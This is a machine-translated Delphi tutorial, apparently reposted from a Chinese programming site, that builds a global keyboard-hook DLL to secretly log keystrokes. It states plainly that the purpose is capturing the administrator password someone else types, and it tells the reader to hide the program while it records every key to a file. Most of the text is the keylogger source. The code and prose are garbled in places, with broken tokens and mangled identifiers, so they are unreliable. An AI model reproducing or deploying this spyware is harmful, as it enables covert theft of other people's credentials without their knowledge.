Delphi programming using hook to monitor windows

Each program has its own living space. In Windows, you can perform operations on your program at any time, trigger messages, and trigger messages in three ways, one is to operate your program interface, onclick, onmousemove, etc. Another one can use Windows message mechanism to capture some system messages, however, if you want to monitor any program at any time, you may choose to hook it. Although there are other methods, you have to admit that, hook is a simple way to solve the problem.

The following is an example (using Delphi7.0 for debugging ):

If you need to access a certain machine, the person will enter the adminsitrator password on your machine after running \ sb. Of course, you can also use a hacker tool to get his password. But why not write a program to record all keyboard operations?

First, you must declare that the hook is different from the general application and must appear as a global DLL. Otherwise, other information cannot be captured in the state where your program is not activated, (Of course, you can use Windows messages. This issue is not discussed here ).

Write a DLL to define the Function

Function setkeyhook: bool; export;
Function endkeyhook: bool; export;
Procedure keyhookexit; far;
Procedure setmainhandle (handle: hwnd); export; forward;
Function keyboardhookhandler (icode: integer; wparam: wparam; lparam: lparam): lresult; stdcall; export;
Procedure entrypointproc (reason: integer );
Const
Hmapobject: thandle = 0;
Begin
Case reason
Dll_process_attach:
Begin
Hmapobject: = createfilemapping ($ ffffffff, nil, page_readwrite, 0, sizeof (thookrec), '_ cbt ');
Fig: = mapviewoffile (hmapobject, file_map_write, 0, 0, 0 );
End;
Dll_process_detach:
Begin
Try
Unmapviewoffile (FIG );
Closehandle (hmapobject );
Except
End;
End;
End;
End;
Procedure keyhookexit; far;
Begin
If hnexthookproc <& gt; 0 then endkeyhook;
Exitproc: = procsaveexit;
End;
Function endkeyhook: bool; export;
Begin
If hnexthookproc <> 0 then
Begin
Unhookwindowshookex (hnexthookproc );
Hnexthookproc: = 0;
Messagebeep (0 );
End;
Result: = hnexthookproc = 0;
Mainhandle: = 0;
End;
Function setkeyhook: bool; export;
Begin
Hnexthookproc: = setwindowshookex (wh_keyboard, keyboardhookhandler, hinstance, 0 );
Result: = hnexthookproc <> 0;
End;
Function keyboardhookhandler (icode: integer; wparam: wparam; lparam: lparam): lresult; stdcall; export;
VaR
S: tstringlist;
Begin
If icode <0 then
Begin
Result: = callnexthookex (hnexthookproc, icode, wparam, lparam );
Exit;
End;
If lparam <0 then
Begin
Exit;
End;
S: = tstringlist. Create;
If fileexists (afilename) then
S. loadfromfile (afilename );
// Save the typed keyboard characters to the file ---www.bianceng.cn
S. Add (formatdatetime ('yyyymmdd hh: NN: SS: ZZZ: ', now) + char (wparam ));
S. savetofile (afilename );
S. Free;
Result: = 0;
End;

The DLL project file is defined as follows:

Exports
Setkeyhook Index 1,
Endkeyhook index 2,
Setmainhandle index 3;
Begin
Hnexthookproc: = 0;
Procsaveexit: = exitproc;
Dllproc: = @ entrypointproc;
Entrypointproc (dll_process_attach );
End.

In this way, the DLL is defined, and the next step is to draw an interface:

Function setkeyhook: bool; External 'keyspy. dll ';
Function endkeyhook: bool; External 'keyspy. dll ';
Procedure setmainhandle (handle: hwnd); External 'keyspy. dll ';
// Start capturing the keyboard
Setmainhandle (handle );
Setkeyhook
// Abort the capture keyboard
Endkeyhook

Then, hide your program and start the capture keyboard. before stopping the capture, all keyboard operations will be recorded in the filename file you have defined. Note: these codes are temporarily written to illustrate how to write a hook program.

In addition, the hook function is not just simple to use, which requires flexible use by everyone. It can be used with many windows APIs to achieve unexpected results through many techniques.

This article from: programming entry network http://www.bianceng.cn/Programming/Delphi/jc/200802/7186.htm